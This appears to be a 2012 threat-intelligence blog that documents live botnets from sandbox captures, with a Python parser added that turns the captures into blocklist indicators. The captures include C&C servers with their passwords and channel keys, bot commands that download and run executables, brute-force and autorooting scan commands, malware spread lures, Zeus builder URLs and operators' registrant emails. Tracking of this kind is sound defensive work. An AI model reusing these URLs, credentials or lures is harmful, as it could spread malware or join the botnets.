Remote Host Port Number
190.98.219.21 80
199.15.234.7 80
74.62.152.160 6060 PASS secret
Local users: Current Local Users: 283 Max: 2070
Global users: Current Global Users: 283 Max: 1422
NICK n{US|XPa}scmyjzc
USER scmyjzc 0 0 :scmyjzc
PONG :7D743289
JOIN #hell secret
PRIVMSG #hell :[d="http://www.lomopalta.com/plugins/new.exe" s="176128 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
hosting infos:
http://whois.domaintools.com/74.62.152.160
Honeypots
Friday, March 16, 2012
Tuesday, March 13, 2012
nhg.knaqu.eu(irc botnet hosted in Denmark Tranbjerg Tdc A/s)
The same guy runs this botnet: http://www.exposedbotnets.com/2010/04/ds32v7k3knaqueu.html
Resolved : [nhg.knaqu.eu] To [62.243.224.85]
Remote Host Port Number
62.243.224.85 4244 PASS NhG
MODE [USA|NhGXP|031763] -ix
JOIN #!En!# #xp
PRIVMSG #!en!# :MSN: Thread Activated, Sending Message.
PONG HTTP1.4
NICK [USA|NhGXP|031763]
USER xyygsge * 0 :COMPUTERNAME
Now talking in #!en!#
Topic On: [ #!en!# ] [ .msn look here is your Photos :D :D http://kenangrafik.com/photo.php ]
Topic By: [ NhG ]
Now talking in #debug#
Topic On: [ #debug# ] [ !NAZEL http://kenangrafik.com/photo.php -n ]
Topic By: [ a ]
hosting infos:
http://whois.domaintools.com/62.243.224.85
fesko-cheats.ru(G-Bot hosted in Ukraine Kiev Private Joint Stock Company Datagroup)
G-Bot, the HTTP malware from Russia with love.
The bot owner tries to hide behind a legit board, which is fesko-cheats.ru.
The panel is located here: http://fesko-cheats.ru/panel/login.php
HTTP Query Text
fesko-cheats.ru GET /panel/getcmd.php?id=951725031&traff=0 HTTP/1.1
Sample
hosting infos:
http://whois.domaintools.com/93.183.203.79
sw.l33t-milf.info( 100k reptile bots spreading via ms exploit)
This is one of the biggest IRC botnets still active: 13 leafs full of bots.
I estimated the botnet size at 100k considering the number of leafs (13), but the real size can be bigger.
Domain names used to control bots:
sw.l33t-milf.info
pics.l33t-ppl.info
Resolved : [sw.l33t-milf.info] To [95.48.93.250]
Resolved : [sw.l33t-milf.info] To [85.159.163.42]
Resolved : [sw.l33t-milf.info] To [208.125.158.219]
Resolved : [sw.l33t-milf.info] To [212.170.205.179]
Resolved : [sw.l33t-milf.info] To [80.2.60.232]
Resolved : [sw.l33t-milf.info] To [192.117.148.103]
Resolved : [sw.l33t-milf.info] To [46.214.145.230]
Resolved : [sw.l33t-milf.info] To [94.156.162.165]
Resolved : [sw.l33t-milf.info] To [59.180.210.189]
Resolved : [sw.l33t-milf.info] To [89.228.97.248]
Resolved : [sw.l33t-milf.info] To [189.35.205.123]
Resolved : [sw.l33t-milf.info] To [211.72.230.83]
Resolved : [sw.l33t-milf.info] To [139.91.102.100]
Resolved : [pics.l33t-ppl.info] To [211.72.230.83]
Resolved : [pics.l33t-ppl.info] To [212.170.205.179]
Resolved : [pics.l33t-ppl.info] To [192.117.148.103]
Resolved : [pics.l33t-ppl.info] To [94.156.162.165]
Resolved : [pics.l33t-ppl.info] To [189.35.205.123]
Resolved : [pics.l33t-ppl.info] To [208.125.158.219]
Resolved : [pics.l33t-ppl.info] To [89.228.97.248]
Resolved : [pics.l33t-ppl.info] To [85.159.163.42]
Resolved : [pics.l33t-ppl.info] To [46.214.145.230]
Resolved : [pics.l33t-ppl.info] To [81.94.153.174]
Resolved : [pics.l33t-ppl.info] To [95.48.93.250]
Resolved : [pics.l33t-ppl.info] To [59.180.210.189]
Resolved : [pics.l33t-ppl.info] To [80.2.60.232]
irc server:
sw.l33t-milf.info:6667
Now talking in #sw#
Topic On: [#sw# ] [ .dl http://dl.dropbox.com/u/66752663/v/f/ms.exe 12]
Topic By: [ Deno ]
Modes On: [ #sw# ] [ +smntMu ]
(VV) .sort
(VV) .sort
Now talking in #USA
Topic On: [ #usa ] [ .msn ATTENTION! You are infected with a msn worm, which may cause damage or in some cases loss of your files, we reccomend you download and use our free remover http://goo.gl/d7vwY ]
Topic By: [ Deno ]
pics.l33t-ppl.info:6667
NICK {iNF-00-USA-XP-COMP-2129}
USER TbT * 0 :COMP
JOIN ##TBT
NICK {00-USA-XP-COMP-5805}
PRIVMSG {00-USA-XP-COMP-..@ :[Current task] Idling [System uptime] 0 days (00 hours & 01 mins) [Bot Uptime] 0 days (00 hours & 00 mins)
Now talking in ##TBT
Topic On: [ ##TBT ] [ .scan SVRSVC_BRUTE 100 5 0 -b -r ]
Topic By: [ Deno ]
Modes On: [ ##TBT ] [ +smntMuN 12]
Samples:
A lot of people claiming to be "coders" around hacking boards say that ircd is dead, is old, etc., but look at IRC here: 13 leafs full of infected machines exploiting Windows vulnerabilities.
This reptile mod by the owner of this botnet, who is named Dee, is better than any "private" bot like ngrBot or the other shit being sold around.
Domain owners:
http://whois.domaintools.com/l33t-milf.info
http://whois.domaintools.com/l33t-ppl.info (they're both registered with http://www.enom.com)
Let's see if eNom will shut them down or just ignore the abuse reports I already sent to them.
Emails used to register these domains:
Domain Name:L33T-PPL.INFO
Admin Email:admin.dalnet@gmail.com
Domain Name:L33T-MILF.INFO
Admin Email:i78@hotmail.com
Labels:
100k reptile bots
Monday, March 12, 2012
122.226.202.225(irc botnet hosted in China Shaoxing Dingqi Internet Science Co. Ltd)
Remote Host Port Number
122.226.202.225 4802 PASS hax0r
Nick: n{US|XPa}okmignn
Channel: #ang (Password: ngrBot)
hosting infos:
http://whois.domaintools.com/122.226.202.225
i.nerashti.net(irc botnet hosted in India Delhi Mtnl Cat B Isp)
Resolved : [i.nerashti.net] To [59.180.210.189]
Remote Host Port Number
107.20.135.4 80
107.20.138.135 80
199.15.234.7 80
59.180.210.189 4244 PASS 666666
80.2.60.232 6667 PASS 666666
PRIVMSG #buli# :[d="http://dl.dropbox.com/u/66711623/v/e/rundat.exe" s="92160 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0
NICK n{US|XPa}eechxgg
USER eechxgg 0 0 :eechxgg
JOIN #BuLi# redem
PRIVMSG #buli# :[MSN]: Updated MSN spread interval to "4"
PRIVMSG #buli# :[MSN]: Updated MSN spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com"
PRIVMSG #buli# :[HTTP]: Updated HTTP spread interval to "3"
PRIVMSG #buli# :[HTTP]: Updated HTTP spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com |"
NICK {NEW}[USA][XP]705470
USER 9458 "" "lol" :9458
PONG :AB40B197
JOIN #sw#
PRIVMSG #sw# :Executed process successfully.
hosting infos:
http://whois.domaintools.com/59.180.210.189
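Every capture on this page has the same shape: the endpoints the sandboxed sample contacted (with the IRC server password on the connect line), the NICK registration, the JOIN with its channel key, and PRIVMSG or topic lines that carry download URLs and dropped-file paths. The Python parser below is an added example, not code from this site, that turns such a capture into a structured indicator set a defender can feed into a blocklist or a detection rule. The regexes, the Session fields and the "PASS on the connect line marks the C&C" heuristic are my own assumptions about the format; the embedded sample lines are taken from this page's own i.nerashti.net and sw.l33t-milf.info captures.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: the page's own captured lines (i.nerashti.net and sw.l33t-milf.info
# posts), embedded here so the parser runs offline.
SAMPLE_SESSION = r"""
Resolved : [i.nerashti.net] To [59.180.210.189]
Remote Host Port Number
107.20.135.4 80
59.180.210.189 4244 PASS 666666
NICK n{US|XPa}eechxgg
USER eechxgg 0 0 :eechxgg
JOIN #BuLi# redem
PRIVMSG #buli# :[d="http://dl.dropbox.com/u/66711623/v/e/rundat.exe" s="92160 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0
PRIVMSG #buli# :[MSN]: Updated MSN spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com"
Topic On: [#sw# ] [ .dl http://dl.dropbox.com/u/66752663/v/f/ms.exe 12]
"""

# Line shapes seen in the captures (assumed regexes, not a formal grammar of the tool output).
ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})(?:\s+PASS\s+(\S+))?\s*$")
RESOLVED_RE = re.compile(r"^Resolved : \[(\S+)\] To \[(\S+)\]")
NICK_RE = re.compile(r"^NICK (\S+)")
JOIN_RE = re.compile(r"^JOIN (\S+)(?:\s+(\S+))?")
PRIVMSG_RE = re.compile(r"^PRIVMSG (\S+) :(.*)$")
TOPIC_RE = re.compile(r"^Topic On: \[\s*(\S+)\s*\] \[\s*(.*?)\s*\]$")
URL_RE = re.compile(r"https?://[^\s\"'\]]+")
DROP_RE = re.compile(r'(?:Executed|Updated bot) file "([^"]+)"')


@dataclass
class Session:
    resolutions: Dict[str, str] = field(default_factory=dict)        # hostname -> IP
    contacted: List[Tuple[str, int]] = field(default_factory=list)   # every (ip, port) touched
    cnc: Optional[Tuple[str, int]] = None                            # the IRC C&C endpoint
    server_password: Optional[str] = None
    nick: Optional[str] = None
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> key
    commands: List[Tuple[str, str]] = field(default_factory=list)     # (channel, topic command)
    urls: Set[str] = field(default_factory=set)
    dropped_files: Set[str] = field(default_factory=set)


def parse_session(text: str) -> Session:
    s = Session()
    last_endpoint: Optional[Tuple[str, int]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "Remote Host Port Number":
            continue
        m = ENDPOINT_RE.match(line)
        if m:
            ep = (m.group(1), int(m.group(2)))
            s.contacted.append(ep)
            last_endpoint = ep
            if m.group(3):  # a PASS on the connect line marks the IRC C&C server
                s.cnc, s.server_password = ep, m.group(3)
            continue
        m = RESOLVED_RE.match(line)
        if m:
            s.resolutions[m.group(1)] = m.group(2)
            continue
        m = NICK_RE.match(line)
        if m:
            s.nick = m.group(1)
            if s.cnc is None:  # no PASS seen: the last endpoint before registration is the C&C
                s.cnc = last_endpoint
            continue
        m = JOIN_RE.match(line)
        if m:
            # RFC 1459 JOIN: comma-separated channels then keys; channel names are case-insensitive.
            chans = m.group(1).lower().split(",")
            keys = (m.group(2) or "").split(",")
            for i, chan in enumerate(chans):
                s.channels[chan] = keys[i] if i < len(keys) and keys[i] else None
            continue
        m = PRIVMSG_RE.match(line)
        if m:
            s.urls.update(URL_RE.findall(m.group(2)))
            s.dropped_files.update(DROP_RE.findall(m.group(2)))
            continue
        m = TOPIC_RE.match(line)
        if m:  # the channel topic is the standing command every joining bot executes
            s.commands.append((m.group(1).lower(), m.group(2)))
            s.urls.update(URL_RE.findall(m.group(2)))
    return s


def indicators(s: Session) -> Dict[str, List[str]]:
    # Flatten a session into blocklist-ready indicator lists.
    ips = {ip for ip, _ in s.contacted} | set(s.resolutions.values())
    return {
        "domains": sorted(s.resolutions),
        "ips": sorted(ips),
        "cnc": [f"{s.cnc[0]}:{s.cnc[1]}"] if s.cnc else [],
        "urls": sorted(s.urls),
        "dropped_files": sorted(s.dropped_files),
    }
```

Calling `indicators(parse_session(SAMPLE_SESSION))` yields the domain, the two contacted IPs, the C&C endpoint with its port, the three URLs (dropper, spread link and topic payload) and the dropped-file path. Channel names are lowercased because the bots on this page JOIN `#BuLi#` and then report to `#buli#`; without normalisation the same channel would be counted twice.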
Saturday, March 10, 2012
vps1.imafish.net(ngrBot hosted in United States Input Output Flood Llc)
Resolved : [vps1.imafish.net] To [199.30.49.171]
Local users: Current Local Users: 47 Max: 132
Global users: Current Global Users: 47 Max: 132
C&C Server: 199.30.49.171:6667
Server Password:
Username: hewjcgy
Nickname: n{DE|XPa}hewjcgy
Channel: #botn (Password: ngrBot)
Channeltopic: :
Topic On: [ #botn ] [ ]
Topic By: [ MagicSata ]
hosting infos:
http://whois.domaintools.com/199.30.49.171
Wednesday, March 7, 2012
zxz666.darktech.org(zeus hosted in Russian Federation Moscow Ojsc Vimpelcom)
Zeus sample here: http://zxz666.darktech.org/zeus/builder/bot.exe
Zeus config file here: http://zxz666.darktech.org/zeus/builder/cfg2.bin
When you open zxz666.darktech.org you are redirected to vkontakte.ru, which asks for a login.
Maybe a masking attempt, or vkontakte.ru is now used to control Zeus bots.
Zeus samples, just in case they get deleted by the hacker:
hosting infos:
http://whois.domaintools.com/93.80.96.91
174.59.20.100(irc botnet hosted in United States Tunkhannock Comcast Cable Communications Inc)
Remote Host Port Number
174.59.20.100 4244
JOIN #vnc# d34th
PRIVMSG #vnc# :.:[ rAGEBoT ]:. range: 59.x.x.x with 94 threads. (autorooting)
PONG irc.undernet.org
hosting infos:
http://whois.domaintools.com/174.59.20.100
Tuesday, March 6, 2012
216.246.124.44(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
216.246.124.44 2345
NICK New[USA|00|P|41019]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-6548 * 0 :COMPUTERNAME
MODE New[USA|00|P|41019] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/216.246.124.44